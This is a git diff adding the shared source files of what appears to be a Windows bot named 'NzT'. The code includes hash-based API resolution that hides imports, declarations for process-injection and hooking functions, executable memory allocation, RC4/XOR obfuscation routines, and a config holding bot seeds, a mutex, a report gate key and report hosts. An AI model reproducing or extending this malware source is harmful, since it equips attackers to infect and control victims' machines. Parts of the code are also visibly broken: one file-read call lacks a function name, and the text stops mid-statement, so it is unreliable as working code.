{HASH_KERNEL32_WIDECHARTOMULTIBYTE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pWideCharToMultiByte}, + {HASH_KERNEL32_RTLLEAVECRITICALSECTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlLeaveCriticalSection}, + {HASH_KERNEL32_TERMINATETHREAD, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pTerminateThread}, + {HASH_KERNEL32_GETTICKCOUNT, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetTickCount}, + {HASH_KERNEL32_OUTPUTDEBUGSTRINGA, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOutputDebugStringA}, + {HASH_KERNEL32_OUTPUTDEBUGSTRINGW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOutputDebugStringW}, + {HASH_KERNEL32_GETLASTERROR, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetLastError}, + {HASH_KERNEL32_SETEVENT, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pSetEvent}, + {HASH_KERNEL32_CREATEEVENTA, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateEventA}, + {HASH_KERNEL32_CREATEEVENTW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateEventW}, + {HASH_KERNEL32_OPENEVENTA, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOpenEventA}, + {HASH_KERNEL32_OPENEVENTW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOpenEventW} + }; + + for (DWORD i = 0; i < sizeof(ApiList) / sizeof(API_T); i++) + if ((*ApiList[i].Function = GetProcAddressByHash(*ApiList[i].Module, ApiList[i].FunctionHash)) == NULL) + return FALSE; + + return TRUE; +} + +BOOL LoadFunctions() +{ + API_T ApiList[] = + { + {HASH_USER32_MESSAGEBOXA, &NzT.Modules.User32, (LPVOID*)&NzT.Api.pMessageBoxA}, + {HASH_USER32_WSPRINTFW, &NzT.Modules.User32, (LPVOID*)&NzT.Api.pwsprintfW}, + { HASH_USER32_WSPRINTFA, &NzT.Modules.User32, (LPVOID*)&NzT.Api.pwsprintfA}, + {HASH_WININET_INTERNETOPENW, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pInternetOpenW}, + {HASH_WININET_INTERNETCONNECTA, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pInternetConnectA}, + //{HASH_WININET_INTERNETCONNECTW, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pInternetConnectW}, + {HASH_WININET_HTTPOPENREQUESTA, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pHttpOpenRequestA}, + //{HASH_WININET_HTTPOPENREQUESTW, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pHttpOpenRequestW}, + {HASH_WININET_HTTPSENDREQUESTA, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pHttpSendRequestA}, + //{HASH_WININET_HTTPSENDREQUESTW, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pHttpSendRequestW}, + {HASH_WININET_INTERNETREADFILE, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pInternetReadFile}, + {HASH_WININET_INTERNETCLOSEHANDLE, &NzT.Modules.Wininet, (LPVOID*)&NzT.Api.pInternetCloseHandle}, + {HASH_SHELL32_SHGETFOLDERPATHW, &NzT.Modules.Shell32, (LPVOID*)&NzT.Api.pSHGetFolderPathW}, + {HASH_ADVAPI32_GETUSERNAMEA, &NzT.Modules.Advapi32, (LPVOID*)&NzT.Api.pGetUserNameA}, + {HASH_USER32_GETCURSORPOS, &NzT.Modules.User32, (LPVOID*)&NzT.Api.pGetCursorPos} + }; + + for (DWORD i = 0; i < sizeof(ApiList) / sizeof(API_T); i++) + if ((*ApiList[i].Function = GetProcAddressByHash(*ApiList[i].Module, ApiList[i].FunctionHash)) == NULL) + return FALSE; + + return TRUE; +} + +BOOL ApiInitialize() +{ + if (GetModules()) + if (LoadNtdllModule()) + if (LoadNtdll()) + if (LoadKernel32()) + if (LoadModules()) + return LoadFunctions(); + return FALSE; +} \ No newline at end of file diff --git a/src/Shared/api.h b/src/Shared/api.h new file mode 100644 index 0000000..4b01034 --- /dev/null +++ b/src/Shared/api.h @@ -0,0 +1,200 @@ +#ifndef _API_H_ +#define _API_H_ + +/* NTDLL */ +#include "ntdll_functions.h" +#include "ntdll_hash.h" + +/* Kernel32 */ +#include "kernel32_functions.h" +#include "kernel32_hash.h" + +/* User32 */ +#include "user32_hash.h" +#include "user32_functions.h" + +/* WinInet */ +#include "wininet_hash.h" +#include "wininet_functions.h" + +/* Shell32 */ +#include "shell32_hash.h" +#include "shell32_functions.h" + +/* Advapi32 */ +#include "advapi32_hash.h" +#include "advapi32_functions.h" + + +/* Structures */ + +typedef struct +{ + /* NTDLL */ + ptRtlRandomEx pRtlRandomEx; + ptRtlGetVersion pRtlGetVersion; + ptNtCreateThread pNtCreateThread; + ptNtQueryInformationProcess pNtQueryInformationProcess; + ptNtCreateUserProcess pNtCreateUserProcess; + ptNtMapViewOfSection pNtMapViewOfSection; + ptNtCreateSection pNtCreateSection; + ptLdrLoadDll pLdrLoadDll; + ptLdrGetDllHandle pLdrGetDllHandle; + ptNtWriteVirtualMemory pNtWriteVirtualMemory; + ptNtAllocateVirtualMemory pNtAllocateVirtualMemory; + ptNtProtectVirtualMemory pNtProtectVirtualMemory; + ptNtDeviceIoControlFile pNtDeviceIoControlFile; + ptNtSetContextThread pNtSetContextThread; + ptNtOpenProcess pNtOpenProcess; + ptNtClose pNtClose; + ptNtCreateFile pNtCreateFile; + ptNtOpenFile pNtOpenFile; + ptNtDeleteFile pNtDeleteFile; + ptNtReadVirtualMemory pNtReadVirtualMemory; + ptNtQueryVirtualMemory pNtQueryVirtualMemory; + ptNtOpenThread pNtOpenThread; + ptNtQueryInformationThread pNtQueryInformationThread; + ptNtResumeThread pNtResumeThread; + ptNtFreeVirtualMemory pNtFreeVirtualMemory; + ptNtFlushInstructionCache pNtFlushInstructionCache; + ptNtSetInformationThread pNtSetInformationThread; + ptNtQuerySystemInformation pNtQuerySystemInformation; + ptLdrQueryProcessModuleInformation pLdrQueryProcessModuleInformation; + ptRtlInitUnicodeString pRtlInitUnicodeString; + ptNtWriteFile pNtWriteFile; + ptNtReadFile pNtReadFile; + ptNtDelayExecution pNtDelayExecution; + ptNtOpenKey pNtOpenKey; + ptNtSetValueKey pNtSetValueKey; + ptNtQueryValueKey pNtQueryValueKey; + ptRtlFormatCurrentUserKeyPath pRtlFormatCurrentUserKeyPath; + ptNtQueryInformationFile pNtQueryInformationFile; + + /* Kernel32 */ + ptVirtualAlloc pVirtualAlloc; + ptVirtualFree pVirtualFree; + ptOpenProcess pOpenProcess; + ptVirtualAllocEx pVirtualAllocEx; + ptVirtualFreeEx pVirtualFreeEx; + ptWriteProcessMemory pWriteProcessMemory; + ptCreateRemoteThread pCreateRemoteThread; + ptCloseHandle pCloseHandle; + ptCreateToolhelp32Snapshot pCreateToolhelp32Snapshot; + ptCreateProcessW pCreateProcessW; + ptVirtualProtect pVirtualProtect; + ptProcess32FirstW pProcess32FirstW; + ptProcess32NextW pProcess32NextW; + ptExitProcess pExitProcess; + ptGetModuleFileNameW pGetModuleFileNameW; + ptDeleteFileW pDeleteFileW; + ptSleep pSleep; + ptLoadLibraryW pLoadLibraryW; + ptIsWow64Process pIsWow64Process; + ptGetCurrentProcessId pGetCurrentProcessId; + ptGetWindowsDirectoryW pGetWindowsDirectoryW; + ptQueueUserAPC pQueueUserAPC; + ptResumeThread pResumeThread; + ptGetSystemDirectoryW pGetSystemDirectoryW; + ptFindFirstFileW pFindFirstFileW; + ptFindNextFileW pFindNextFileW; + ptCreateThread pCreateThread; + ptCreateFileW pCreateFileW; + ptWriteFile pWriteFile; + ptReadFile pReadFile; + ptGetFileSize pGetFileSize; + ptGetVersionExW pGetVersionExW; + ptFindFirstVolumeW pFindFirstVolumeW; + ptGetVolumeInformationW pGetVolumeInformationW; + ptFindVolumeClose pFindVolumeClose; + ptMultiByteToWideChar pMultiByteToWideChar; + ptGetModuleHandleW pGetModuleHandleW; + ptFlushInstructionCache pFlushInstructionCache; + ptGetProcessHeap pGetProcessHeap; + ptHeapAlloc pHeapAlloc; + ptHeapFree pHeapFree; + ptGetCurrentProcess pGetCurrentProcess; + ptThread32First pThread32First; + ptThread32Next pThread32Next; + ptOpenMutexW pOpenMutexW; + ptReleaseMutex pReleaseMutex; + ptCreateMutexW pCreateMutexW; + ptVirtualQuery pVirtualQuery; + ptCreateFileMappingW pCreateFileMappingW; + ptMapViewOfFile pMapViewOfFile; + ptUnmapViewOfFile pUnmapViewOfFile; + ptDuplicateHandle pDuplicateHandle; + ptGetCurrentThread pGetCurrentThread; + ptFlushFileBuffers pFlushFileBuffers; + ptDisconnectNamedPipe pDisconnectNamedPipe; + ptGetProcAddress pGetProcAddress; + ptRtlInitializeCriticalSection pRtlInitializeCriticalSection; + ptRtlEnterCriticalSection pRtlEnterCriticalSection; + ptRtlLeaveCriticalSection pRtlLeaveCriticalSection; + ptWideCharToMultiByte pWideCharToMultiByte; + ptTerminateThread pTerminateThread; + ptGetTickCount pGetTickCount; + ptOutputDebugStringA pOutputDebugStringA; + ptOutputDebugStringW pOutputDebugStringW; + ptGetLastError pGetLastError; + ptSetEvent pSetEvent; + ptCreateEventA pCreateEventA; + ptCreateEventW pCreateEventW; + ptOpenEventA pOpenEventA; + ptOpenEventW pOpenEventW; + + + /* User32 */ + ptMessageBoxA pMessageBoxA; + ptwsprintfW pwsprintfW; + ptwsprintfA pwsprintfA; + ptGetCursorPos pGetCursorPos; + + /* WinInet */ + ptInternetOpenW pInternetOpenW; + ptInternetConnectA pInternetConnectA; + ptHttpOpenRequestA pHttpOpenRequestA; + ptHttpSendRequestA pHttpSendRequestA; + ptHttpQueryInfoA pHttpQueryInfoA; + ptInternetCloseHandle pInternetCloseHandle; + ptInternetReadFile pInternetReadFile; + + /* Shell32 */ + ptSHGetFolderPathW pSHGetFolderPathW; + + /* Advapi32 */ + ptGetUserNameA pGetUserNameA; +} API_FUNCTIONS; + +typedef struct +{ + HMODULE Kernel32, Ntdll, User32, Wininet, Shell32, Advapi32, Urlmon, Ws2_32, Shlwapi; +} API_MODULES; + +typedef struct +{ + DWORD ModuleHash; + HMODULE* Module; +} API_MODULE; + +typedef struct +{ + DWORD FunctionHash; + HMODULE* Module; + LPVOID* Function; +} API_T; + +typedef struct +{ + DWORD Table[256]; + BOOL Initialized; +} CRC; + +/* Functions */ +HMODULE GetModuleHandleByHash(DWORD Hash); +LPVOID GetProcAddressByHash( + HMODULE Module, + DWORD Hash +); +BOOL ApiInitialize(); + +#endif \ No newline at end of file diff --git a/src/Shared/config.c b/src/Shared/config.c new file mode 100644 index 0000000..0d9c21c --- /dev/null +++ b/src/Shared/config.c @@ -0,0 +1,6 @@ +#include + +#include "config.h" + +LPTSTR g_Hosts[] = { "127.0.0.1", "10.0.0.65", NULL}; +UCHAR g_NumberHosts = (UCHAR)(sizeof(g_Hosts) / sizeof(LPTSTR)); \ No newline at end of file diff --git a/src/Shared/config.h b/src/Shared/config.h new file mode 100644 index 0000000..a6cf34d --- /dev/null +++ b/src/Shared/config.h @@ -0,0 +1,22 @@ +#ifndef _CONFIG_H_ +#define _CONFIG_H_ + +#define NZT_SEED 0x1231231 //change every unique build +#define NZT_VERSION 0x1000 +#define NZT_MUTEX "m_NzT_m" + +#define BOT_FILE_NAME_SEED 0x1231231 +#define BOT_FOLDER_NAME_SEED 0x41231 + +#define REPORT_GATE_KEY "LET_ME_IN!" +#define REPORT_TIME 1 //minutes + +#define REPORT_TYPE_KNOCK 0x24023dd8 +#define REPORT_TYPE_CONFIG 0xd48a2f7c + +extern UCHAR g_NumberHosts; +extern LPTSTR* g_pHosts; +extern LPTSTR g_pHostsString; +extern LPTSTR g_Hosts[]; + +#endif \ No newline at end of file diff --git a/src/Shared/crt.c b/src/Shared/crt.c new file mode 100644 index 0000000..3d3a693 --- /dev/null +++ b/src/Shared/crt.c @@ -0,0 +1,501 @@ +#include + +#include "crt.h" +#include "nzt.h" +#include "ntdll.h" +#include "utils.h" + +void MemoryCopy(void* Destination, const void* Source, DWORD Size) +{ + DWORD i; + for (i = 0; i < Size; i++) + { + ((LPBYTE)Destination)[i] = ((LPBYTE)Source)[i]; + } +} + +//MemoryCopy pad by 8 bytes for relative JMP (0xE9) +VOID SafeMemoryCopy_p( + LPVOID Destination, + LPVOID Source, + DWORD Size +) +{ + BYTE Buffer[8]; + + if (Size > 8) + return; + + //8 bytes padding + MemoryCopy(Buffer, Destination, 8); + MemoryCopy(Buffer, Source, Size); + + if (Is64Bit()) + { + _InterlockedCompareExchange64((LONGLONG *)Destination, *(LONGLONG*)Buffer, *(LONGLONG *)Destination); + return; + } + + __asm + { + lea esi, Buffer; + mov edi, Destination; + + mov eax, [edi]; + mov edx, [edi + 4]; + mov ebx, [esi]; + mov ecx, [esi + 4]; + + lock cmpxchg8b[edi]; + } +} + +VOID MemoryZero( + PVOID Destination, + SIZE_T Size +) +{ + PCHAR Data = NULL; + + if ((Data = (char*)Destination) == NULL) + return; + + for (DWORD i = 0; i < Size; i++) + Data[i] = 0x00; +} + +DWORD MemorySize(LPVOID Address) +{ + MEMORY_BASIC_INFORMATION Memory; + + if (!Address) + return 0; + + NzT.Api.pVirtualQuery(Address, &Memory, sizeof(MEMORY_BASIC_INFORMATION)); + + return Memory.RegionSize; + +} + +LPVOID Malloc(DWORD Size) +{ + LPVOID Ptr = 0; + + if (API(NtAllocateVirtualMemory(CURRENT_PROCESS, &Ptr, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) >= 0) + MemoryZero(Ptr, Size); + + return Ptr; +} + +VOID Free(PVOID Data) +{ + DWORD f = 0; + + if (Data) + API(NtFreeVirtualMemory(CURRENT_PROCESS, &Data, &f, MEM_RELEASE)); +} + +LPVOID Realloc( + PVOID Old, + SIZE_T Size +) +{ + LPVOID NewAddress = NULL; + DWORD OldLength = 0; + + if (Old) + OldLength = MemorySize(Old); + + NewAddress = NULL; + if (Size > 0) + { + NewAddress = Malloc(Size); + if (Old && NewAddress && OldLength) + { + if (Size < OldLength) + OldLength = Size; + MemoryCopy(NewAddress, Old, OldLength); + } + } + + if (Old != NULL) + Free(Old); + + return NewAddress; +} + +BOOL ReallocEx( + PVOID Old, + DWORD Size +) +{ + if (Size == 0) + { + Free(*(LPBYTE *)Old); + *(LPBYTE *)Old = NULL; + } + else + { + register PVOID p = Realloc(*(LPBYTE *)Old, Size); + if (p == NULL) return FALSE; + *(LPBYTE *)Old = (LPBYTE)p; + } + + return TRUE; +} + +INT IntToString(CONST PCHAR String) +{ + INT Number = 0; + INT i = 0; + + // run till the end of the string is reached, or the + // current character is non-numeric + while (String[i] && (String[i] >= '0' && String[i] <= '9')) + { + Number = Number * 10 + (String[i] - '0'); + i++; + } + + return Number; +} + + +DWORD StringLengthA(CONST LPSTR String) +{ + DWORD Size = 0; + + if (String == NULL) + return 0; + + do + { + if (String[Size] == 0) + break; + + Size++; + } while (TRUE); + + return Size; +} + +DWORD StringLengthW(CONST LPWSTR String) +{ + DWORD Size = 0; + + if (String == NULL) + return 0; + + do + { + if (String[Size] == 0) + break; + + Size++; + } while (TRUE); + + return Size; +} + +LPSTR StringCopyA( + CONST LPSTR Input, + DWORD Length +) +{ + LPSTR Data; + + if ((Data = (LPSTR)Malloc(Length + 1)) == NULL) + return NULL; + + MemoryCopy(Data, Input, Length); + + return Data; +} + +LPWSTR StringCopyW( + CONST LPWSTR Input, + DWORD Length +) +{ + LPWSTR Data; + DWORD NewStringLength; + + NewStringLength = Length * sizeof(wchar_t); + + if ((Data = (LPWSTR)Malloc(NewStringLength + sizeof(wchar_t))) == NULL) + return NULL; + + MemoryCopy(Data, Input, NewStringLength); + + return Data; +} + +BOOL StringConcatExA( + LPSTR* ppszData, + DWORD dwCurrentLength, + const LPSTR pszSource, + DWORD dwLength +) +{ + if (ReallocEx(ppszData, dwCurrentLength + dwLength + 1)) + { + MemoryCopy((*ppszData) + dwCurrentLength, pszSource, dwLength); + return TRUE; + } + + return FALSE; +} + +BOOL StringConcatA( + LPSTR* ppszData, + const LPSTR pszSource +) +{ + return StringConcatExA(ppszData, StringLengthA(*ppszData), pszSource, StringLengthA(pszSource)); +} + +BOOL StringConcatExW( + LPWSTR* ppwzData, + DWORD dwCurrentLength, + const LPWSTR pwzSource, + DWORD dwLength +) +{ + if (ReallocEx(ppwzData, (dwCurrentLength + dwLength + 1) * sizeof(wchar_t))) + { + MemoryCopy((*ppwzData) + dwCurrentLength, pwzSource, dwLength * sizeof(wchar_t)); + return TRUE; + } + + return FALSE; +} + +BOOL StringConcatW( + LPWSTR* ppwzData, + const LPWSTR pwzSource) +{ + return StringConcatExW(ppwzData, StringLengthW(*ppwzData), pwzSource, StringLengthW(pwzSource)); +} + +INT StringCompareA( + LPCSTR String1, + LPCSTR String2 +) +{ + for (; *String1 == *String2; String1++, String2++) + { + if (*String1 == '\0') + return 0; + } + + return ((*(LPCSTR)String1 < *(LPCSTR)String2) ? -1 : +1); +} + +BOOL StringCompareW( + CONST LPWSTR Input, + CONST LPWSTR Data +) +{ + DWORD InputLength, DataLength, i; + + InputLength = StringLengthW(Input); + DataLength = StringLengthW(Data); + + if (DataLength != InputLength) + return FALSE; + + for (i = 0; i < DataLength; i++) + { + if (Input[i] != Data[i]) + return FALSE; + } + + return TRUE; +} + +PCHAR StringTokenizeA( + PCHAR str, + CONST PCHAR Delimiter +) +{ + static int pos; + static char *s; + int i = 0, start = pos; + + // Copying the string for further calls of strtok + if (str != NULL) + s = str; + + i = 0; + int j = 0; + //While not end of string + while (s[pos] != '\0') + { + j = 0; + //Comparing of one of the delimiter matches the character in the string + while (Delimiter[j] != '\0') + { + //Pos point to the next location in the string that we have to read + if (s[pos] == Delimiter[j]) + { + //Replace the delimter by \0 to break the string + s[pos] = '\0'; + pos = pos + 1; + //Checking for the case where there is no relevant string before the delimeter. + //start specifies the location from where we have to start reading the next character + if (s[start] != '\0') + return (&s[start]); + else + { + // Move to the next string after the delimiter + start = pos; + // Decrementing as it will be incremented at the end of the while loop + pos--; + break; + } + } + j++; + } + pos++; + }//End of Outer while + s[pos] = '\0'; + if (s[start] == '\0') + return NULL; + else + return &s[start]; +} + +PWCHAR StringTokenizeW( + PWCHAR String, + CONST PWCHAR Delim +) +{ + PWCHAR Last = NULL; + PWCHAR SpanP = NULL, Token = NULL; + INT C = 0, SC = 0; + + if (String == NULL) + return NULL; + +CONTINUE: + + C = *String++; + + for (SpanP = (PWCHAR)Delim; (SC = *SpanP++) != ERROR_SUCCESS;) + { + if (C == SC) + goto CONTINUE; + } + + if (C == ERROR_SUCCESS) { Last = NULL; return NULL; } + + Token = String - 1; + + for (;;) + { + C = *String++; + SpanP = (PWCHAR)Delim; + + do { + if ((SC = *SpanP++) == C) + { + if (C == ERROR_SUCCESS) + String = NULL; + else + String[-1] = '\0'; + + Last = String; + return Token; + } + } while (SC != ERROR_SUCCESS); + } + + return NULL; +} + +PWCHAR StringToLowerW( + CONST PWCHAR Input, + DWORD Length +) +{ + int c = 0; + static WCHAR Lower[255]; + + if (Input == NULL) + return NULL; + + MemoryZero(&Lower, sizeof(Lower)); + + for (DWORD i = 0; i < Length; i++) + { + c = Input[i]; + + if (c >= 65 && c <= 90) + c += 32; + + Lower[i] = c; + } + + return Lower; +} + +BOOL StringEndsWithSlashW(CONST PWCHAR String) +{ + DWORD Length; + WCHAR Data; + + if ((Length = StringLengthW(String)) == 0) + return FALSE; + + Data = String[Length]; + + if (Data == L'\\') return TRUE; + + return FALSE; +} + +char *StringChr(s, c) +register const char *s; +int c; +{ + char *rtnval = 0; + + do { + if (*s == c) + rtnval = (char*)s; + } while (*s++); + return (rtnval); +} + +BOOL StringToUnicode( + PUNICODE_STRING String, + CONST LPWSTR Buffer +) +{ + DWORD Length; + + if (String == 0) + return FALSE; + + Length = StringLengthW(Buffer); + + if ((String->Buffer = StringCopyW(Buffer, Length)) == 0) + return FALSE; + + String->Length = Length * 2; + String->MaximumLength = Length * 2; + + return TRUE; +} + +void FreeUnicodeString(PUNICODE_STRING String) +{ + if (String == 0) + return; + + if (String->Buffer != 0) + { + Free(String->Buffer); + MemoryZero(String, sizeof(UNICODE_STRING)); + } +} \ No newline at end of file diff --git a/src/Shared/crt.h b/src/Shared/crt.h new file mode 100644 index 0000000..69fbb28 --- /dev/null +++ b/src/Shared/crt.h @@ -0,0 +1,45 @@ +#ifndef _CRT_H_ +#define _CRT_H_ + +#include "ntdll.h" + +/* memory */ +void MemoryCopy(void* Destination, const void* Source, DWORD Size); +VOID MemoryZero(PVOID Destination, SIZE_T Size); +DWORD MemorySize(LPVOID Address); + +LPVOID Malloc(DWORD Size); +VOID Free(PVOID Data); + +BOOL ReallocEx(PVOID Old, DWORD Size); +LPVOID Realloc(PVOID Old, SIZE_T Size); + +/* strings */ +INT IntToString(CONST PCHAR String); + +DWORD StringLengthA(CONST LPSTR String); +DWORD StringLengthW(CONST LPWSTR String); + +LPSTR StringCopyA(CONST LPSTR Input, DWORD Length); +LPWSTR StringCopyW(CONST LPWSTR Input, DWORD Length); + +BOOL StringConcatExA(LPSTR* ppszData, DWORD dwCurrentLength, const LPSTR pszSource, DWORD dwLength); +BOOL StringConcatA(LPSTR* ppszData, const LPSTR pszSource); +BOOL StringConcatExW(LPWSTR* ppwzData, DWORD dwCurrentLength, const LPWSTR pwzSource, DWORD dwLength); +BOOL StringConcatW(LPWSTR* ppwzData, const LPWSTR pwzSource); + +INT StringCompareA(LPCSTR String1, LPCSTR String2); +BOOL StringCompareW(CONST LPWSTR Input, CONST LPWSTR Data); + +PCHAR StringTokenizeA(PCHAR String, CONST PCHAR Delim); +PWCHAR StringTokenizeW(PWCHAR String, CONST PWCHAR Delim); + +PWCHAR StringToLowerW(CONST PWCHAR Input, DWORD Length); +BOOL StringEndsWithSlashW(CONST PWCHAR String); + +char* StringChr(s, c); + +BOOL StringToUnicode(PUNICODE_STRING String, CONST LPWSTR Buffer); +void FreeUnicodeString(PUNICODE_STRING String); + +#endif \ No newline at end of file diff --git a/src/Shared/crypto.c b/src/Shared/crypto.c new file mode 100644 index 0000000..fa22f42 --- /dev/null +++ b/src/Shared/crypto.c @@ -0,0 +1,121 @@ +#include "nzt.h" +#include "crypto.h" + +#define RtlOffsetToPointer(B,O) ((PCHAR)(((PCHAR)(B)) + ((ULONG_PTR)(O)))) + +DWORD Crc32Hash(CONST PVOID Data, DWORD Size) +{ + DWORD i, j, crc, cc; + + if (NzT.Crc.Initialized == FALSE) + { + for (i = 0; i < 256; i++) + { + crc = i; + for (j = 8; j > 0; j--) + { + if (crc & 0x1)crc = (crc >> 1) ^ 0xEDB88320L; + else crc >>= 1; + } + NzT.Crc.Table[i] = crc; + } + + NzT.Crc.Initialized = TRUE; + } + cc = 0xFFFFFFFF; + for (i = 0; i < Size; i++)cc = (cc >> 8) ^ NzT.Crc.Table[(((LPBYTE)Data)[i] ^ cc) & 0xFF]; + return ~cc; +} + +VOID CryptRC4(PCHAR pKey, DWORD Key, PVOID Destination, PVOID Source, DWORD Length) +{ + DWORD i = 0, j = 0, k = 0; + UCHAR ucKey[256] = { 0 }; + UCHAR ucTemp = 0; + + for (i = 0; i < sizeof(ucKey); i++) + ucKey[i] = (CHAR)i; + + for (i = j = 0; i < sizeof(ucKey); i++) + { + j = (j + pKey[i % Key] + ucKey[i]) % 256; + + ucTemp = ucKey[i]; + ucKey[i] = ucKey[j]; + ucKey[j] = ucTemp; + } + + for (i = j = 0, k = 0; k < Length; k++) + { + i = (i + 1) % 256; + j = (j + ucKey[i]) % 256; + + ucTemp = ucKey[i]; + ucKey[i] = ucKey[j]; + ucKey[j] = ucTemp; + + *RtlOffsetToPointer(Destination, k) = *RtlOffsetToPointer(Source, k) ^ ucKey[(ucKey[i] + ucKey[j]) % 256]; + } +} + +// +// Encrypts the specified memory buffer by XORing it's data with the specified key value in CBC manner. +// +VOID __stdcall CryptXor( + PCHAR Buffer, // data buffer + ULONG Size, // size of the buffer in bytes + ULONG Key, // key value + BOOL SkipZero // TRUE to skip zero dwords +) +{ + PULONG pDwords = (PULONG)Buffer; + ULONG uDword, uVector = 0, Count = 0; + + if (Size /= sizeof(ULONG)) + { + do + { + uDword = *pDwords; + + if (SkipZero && uDword == 0 && Size > 1 && pDwords[1] == 0) + break; + + uDword = _rotl(uDword, Count += 1); + uDword ^= uVector; + uDword ^= Key; + uVector = uDword; + + *pDwords = uDword; + pDwords += 1; + } while (Size -= 1); + } // if (Size /= sizeof(ULONG)) +} + +VOID __stdcall XorDecryptBuffer( + PCHAR Buffer, // buffer containing encrypted data + ULONG Size, // size of the buffer in bytes + ULONG Key, // key value + BOOL SkipZero // TRUE to skip zero dwords +) +{ + PULONG pDwords = (PULONG)Buffer; + ULONG uDword, uLast, uVector = 0, Count = 0; + + if (Size /= sizeof(ULONG)) + { + do + { + uLast = uDword = *pDwords; + if (SkipZero && uDword == 0) + break; + + uDword ^= Key; + uDword ^= uVector; + uDword = _rotr(uDword, Count += 1); + uVector = uLast; + + *pDwords = uDword; + pDwords += 1; + } while (Size -= 1); + } // if (Size /= sizeof(ULONG)) +} diff --git a/src/Shared/crypto.h b/src/Shared/crypto.h new file mode 100644 index 0000000..d857552 --- /dev/null +++ b/src/Shared/crypto.h @@ -0,0 +1,20 @@ +#ifndef _CRYPTO_H_ +#define _CRYPTO_H_ + + +DWORD Crc32Hash(CONST PVOID Data, DWORD Size); +VOID CryptRC4(PCHAR pKey, DWORD Key, PVOID Destination, PVOID Source, DWORD Length); +VOID __stdcall CryptXor( + PCHAR Buffer, // data buffer + ULONG Size, // size of the buffer in bytes + ULONG Key, // key value + BOOL SkipZero // TRUE to skip zero dwords +); +VOID __stdcall XorDecryptBuffer( + PCHAR Buffer, // buffer containing encrypted data + ULONG Size, // size of the buffer in bytes + ULONG Key, // key value + BOOL SkipZero // TRUE to skip zero dwords +); + +#endif \ No newline at end of file diff --git a/src/Shared/debug.c b/src/Shared/debug.c new file mode 100644 index 0000000..e69de29 diff --git a/src/Shared/file.c b/src/Shared/file.c new file mode 100644 index 0000000..d104d6e --- /dev/null +++ b/src/Shared/file.c @@ -0,0 +1,222 @@ +#include + +#include "file.h" +#include "crt.h" +#include "ntdll.h" +#include "nzt.h" +#include "utils.h" + +BOOL FileGetInfo(HANDLE FileHandle, PFILE_STANDARD_INFORMATION Info) +{ + IO_STATUS_BLOCK IO; + + MemoryZero(&IO, sizeof(IO_STATUS_BLOCK)); + MemoryZero(Info, sizeof(FILE_STANDARD_INFORMATION)); + + if (API(NtQueryInformationFile)(FileHandle, &IO, Info, sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation) >= 0) + return TRUE; + + return FALSE; +} + +BOOL FileGetSize(HANDLE FileHandle, PDWORD FileSize) +{ + FILE_STANDARD_INFORMATION Info; + + *FileSize = 0; + + if (!FileGetInfo(FileHandle, &Info)) + return FALSE; + + *FileSize = Info.AllocationSize.LowPart; + return TRUE; +} + +BOOL FileOpen(HANDLE* FileHandle, CONST LPWSTR Path, ACCESS_MASK AccessMask, ULONG CreateDisposition) +{ + NTSTATUS Status; + UNICODE_STRING US; + OBJECT_ATTRIBUTES OA; + IO_STATUS_BLOCK IO; + BOOL bStatus = FALSE; + + *FileHandle = INVALID_HANDLE_VALUE; + + MemoryZero(&IO, sizeof(IO_STATUS_BLOCK)); + MemoryZero(&OA, sizeof(OBJECT_ATTRIBUTES)); + + OA.Length = sizeof(OBJECT_ATTRIBUTES); + API(RtlInitUnicodeString)(&US, Path); + OA.ObjectName = &US; + OA.Attributes = OBJ_CASE_INSENSITIVE; + + Status = API(NtCreateFile(FileHandle, AccessMask | SYNCHRONIZE, &OA, &IO, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE, CreateDisposition, FILE_NON_DIRECTORY_FILE | FILE_RANDOM_ACCESS | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0)); + + if (NT_SUCCESS(Status)) + bStatus = TRUE; + + return bStatus; +} + +BOOL FileWrite(HANDLE FileHandle, CONST LPVOID Buffer, DWORD Length) +{ + NTSTATUS Status; + IO_STATUS_BLOCK IO; + Status = API(NtWriteFile)(FileHandle, NULL, NULL, NULL, &IO, &Buffer, Length, NULL, NULL); + if (NT_SUCCESS(Status)) + return TRUE; + + return FALSE; +} + +BOOL FileRead(HANDLE FileHandle, LPVOID* Buffer, DWORD Length, PDWORD ReadLength) +{ + IO_STATUS_BLOCK IO; + LARGE_INTEGER LI; + + LI.LowPart = 0; + LI.HighPart = 0; + + if ((*Buffer = Malloc(Length)) == 0) + return FALSE; + + if ( (FileHandle, 0, 0, 0, &IO, *Buffer, Length, &LI, 0) >= 0) + { + *ReadLength = IO.Information; + return TRUE; + } + + return FALSE; +} + +BOOL FileWriteBuffer(CONST LPWSTR Path, CONST LPVOID Buffer, DWORD Length, BOOL Append) +{ + BOOL Status = FALSE; + HANDLE FileHandle; + + if (!FileOpen(&FileHandle, Path, GENERIC_WRITE, FILE_OPEN_IF)) + return Status; + + Status = FileWrite(FileHandle, Buffer, Length); + API(NtClose)(FileHandle); + + return Status; +} + + +BOOL FileReadBuffer(CONST LPWSTR Path, LPVOID* Buffer, PDWORD Length) +{ + BOOL Status = FALSE; + HANDLE FileHandle; + DWORD FileSize; + + if (!FileOpen(&FileHandle, Path, GENERIC_READ, FILE_OPEN)) + return Status; + + if (!FileGetSize(FileHandle, &FileSize)) + return Status; + + Status = 